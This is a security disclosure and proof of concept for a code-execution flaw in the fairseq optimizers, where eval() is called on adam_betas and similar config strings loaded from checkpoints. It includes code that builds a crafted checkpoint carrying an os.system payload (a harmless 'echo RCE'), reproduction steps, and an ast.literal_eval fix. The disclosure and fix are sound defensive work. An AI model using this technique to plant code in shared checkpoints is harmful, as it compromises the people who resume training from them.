# fairseq eval() Config RCE PoC

## Vulnerability
Several fairseq optimizer implementations call `eval()` on string-valued config fields restored from checkpoints. A malicious checkpoint with a crafted `adam_betas` value therefore achieves arbitrary code execution when training is resumed from it.
## Affected Code

- `fairseq/optim/adam.py:91` - `eval(self.cfg.adam_betas)`
- `fairseq/optim/adamax.py:42` - `eval(self.args.adamax_betas)`
- `fairseq/optim/cpu_adam.py:78` - `eval(self.cfg.adam_betas)`
- `fairseq/optim/fused_lamb.py:44` - `eval(self.args.lamb_betas)`
- `fairseq/optim/adafactor.py:55` - `eval(self.args.adafactor_eps)`
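The vulnerable pattern is the same in every affected file: a tuple-valued hyperparameter stored as a string (e.g. `"(0.9, 0.999)"`) is parsed by passing it straight to `eval()`. A minimal sketch of the pattern (`parse_betas_vulnerable` is a stand-in name, not fairseq's actual function):

```python
def parse_betas_vulnerable(adam_betas: str):
    # Equivalent to fairseq/optim/adam.py:91: eval(self.cfg.adam_betas)
    return eval(adam_betas)

# The intended use works as expected...
print(parse_betas_vulnerable("(0.9, 0.999)"))  # (0.9, 0.999)

# ...but any Python expression in the checkpoint string is executed too.
# Harmless stand-in for the os.system payload used by the PoC:
payload = "__import__('platform').system()"
print(parse_betas_vulnerable(payload))
```

Because `eval()` evaluates arbitrary expressions, the attacker fully controls what runs in the training process.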
## Files

- `malicious_checkpoint.pt` - checkpoint with eval-exploitable `adam_betas`
- `poc_fairseq_eval_rce.py` - standalone PoC script
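A hypothetical sketch of the payload such a checkpoint could carry. Plain `pickle` is used here as a stand-in for `torch.save`/`torch.load` (which serialize via pickle internally), and the nested `cfg` layout mirrors the `state["cfg"]["optimization"]["adam_betas"]` path used in the reproduction:

```python
import pickle

# Crafted checkpoint dict: a Python expression where the expected
# tuple literal "(0.9, 0.999)" should be.
state = {
    "cfg": {
        "optimization": {
            "adam_betas": "__import__('os').system('echo RCE')",
        }
    },
}
blob = pickle.dumps(state)

# Deserialization restores the string unchanged; nothing executes until
# a victim's fairseq process eval()s it while resuming training.
loaded = pickle.loads(blob)
assert loaded["cfg"]["optimization"]["adam_betas"] == "__import__('os').system('echo RCE')"
```

Note that the payload itself is inert at load time, so `weights_only=True` style pickle hardening does not help here: the string is ordinary data until fairseq's optimizer `eval()`s it.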
## Reproduction

```python
import torch

state = torch.load("malicious_checkpoint.pt", weights_only=False)
adam_betas = state["cfg"]["optimization"]["adam_betas"]
# adam_betas = "__import__('os').system('echo RCE')"
eval(adam_betas)  # This is what fairseq does at adam.py:91
```
## Fix

Replace `eval()` with `ast.literal_eval()` in all five affected optimizer files. `ast.literal_eval` accepts only Python literals (tuples, numbers, strings, etc.) and rejects arbitrary expressions.
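A sketch of the safe replacement (`parse_betas_safe` is an illustrative name, not fairseq's API):

```python
import ast

def parse_betas_safe(adam_betas: str):
    # ast.literal_eval only parses Python literals; any expression
    # containing a call, attribute access, etc. raises ValueError.
    return ast.literal_eval(adam_betas)

print(parse_betas_safe("(0.9, 0.999)"))  # (0.9, 0.999)

try:
    parse_betas_safe("__import__('os').system('echo RCE')")
except ValueError:
    print("payload rejected")
```

The benign config strings fairseq actually stores (tuple and float literals) all parse unchanged, so the substitution is drop-in for legitimate checkpoints.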